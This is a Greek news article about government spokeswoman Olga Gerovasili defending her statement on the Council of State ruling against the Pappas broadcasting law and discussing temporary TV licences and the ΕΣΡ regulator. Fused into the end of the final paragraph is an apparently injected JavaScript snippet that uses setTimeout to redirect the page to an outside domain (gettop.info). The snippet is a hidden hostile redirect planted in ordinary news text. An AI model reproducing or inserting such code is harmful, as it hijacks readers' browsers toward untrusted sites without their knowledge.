Γεροβασίλη: Ήταν ανόητο που έκριναν το ύφος μου στη δήλωση για το ΣτΕ

0
7

 

Στην κριτική που δέχθηκε, μετά την εκφώνηση της δήλωσης κατά του ΣτΕ που αποφάσισε ότι ο νόμος Παππά είναι αντισυνταγματικός, απάντησε η κυβερνητική εκπρόσωπος Όλγα Γεροβασίλη.

Μιλώντας στον Σκάι είπε ότι η δήλωσή της δεν ήταν «λαϊκίστικη». «Έχουμε απόψεις και δεν απαγορεύεται να τις λέμε. Το άρθρο 14 του Συντάγματος μού επιτρέπει να λέω την άποψή μου (…) Καλώς εξέφρασα τη δήλωσή μου και καλώς εξέφρασε την άποψή της η Ένωση Δικαστών και Εισαγγελέων». «Ήταν ανόητο που κρίνουν το ύφος μου στη δήλωση. Και κρίνουμε και τηρούμε τους νόμους, οι άλλοι κρίνουν και δεν τηρούν τους νόμους» παρατήρησε ακόμη.

Η κυβερνητική εκπρόσωπος διευκρίνισε πως αν στη σημερινή Διάσκεψη των Προέδρων της Βουλής, αν οριστεί ΕΣΡ δεν χρειάζεται προσωρινή αδειοδότηση, θα υπάρξει προσωρινή βεβαίωση λειτουργίας μέχρι να συγκροτηθεί το ΕΣΡ. «Αν δεν συγκροτηθεί το ΕΣΡ εμείς δεν μπορούμε να συμπαρασυρθούμε από τη ΝΔ. Κάθε κράτος σοβαρό πρέπει να συγκροτήσει νόμιμη διαδικασία μέχρι να συγκροτηθεί το ΕΣΡ. Ο υπουργός Επικρατείας είναι αναρμόδιος για διαγωνισμό, βάσει της απόφασης του ΣτΕ, όχι για να δώσει προσωρινές άδειες. Προχωράμε σε μεταβατικό στάδιο».

«Δεν ήταν πολιτική ήττα το θέμα της αντισυνταγματικότητας του νόμου Παππά, νόμοι κυβερνητικοί έχουν κριθεί αντισυνταγματικοί άπειροι» επέμεινε ακόμη.

Η κυβερνητική εκπρόσωπος δήλωσε πως είναι «παράδοξο που αντιδρά στον κ. Πολύδωρα η ΝΔ». «Η πρότασή μας είναι ο κ. Πολύδωρας, πάντως είμαστε ανοιχτοί σε διάλογο για το ΕΣΡ» σχολίασε.

«Το σκεπτικό μας ήταν μη παραταξιακό, ήταν συναινετική η λογική επιλογής του κ. Πολύδωρα».

Απευθυνόμενη στους παρουσιαστές της εκπομπής που τη φιλοξενούσε, η κυβερνητική εκπρόσωπος παρατήρησε πως «ούτε εσείς έχετε άδεια, κανείς δεν έχει από 31/12/15, δεν θα περάσουμε όμως σε μαύρο». Όπως εξήγησε, η νέα ρύθμιση Παππά για τις προσωρινές άδειες θα αφορά όλα τα παλιά κανάλια αλλά και τα νέα, αρκεί να πληρούνται τα κριτήρια που προβλέπει ο νόμος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here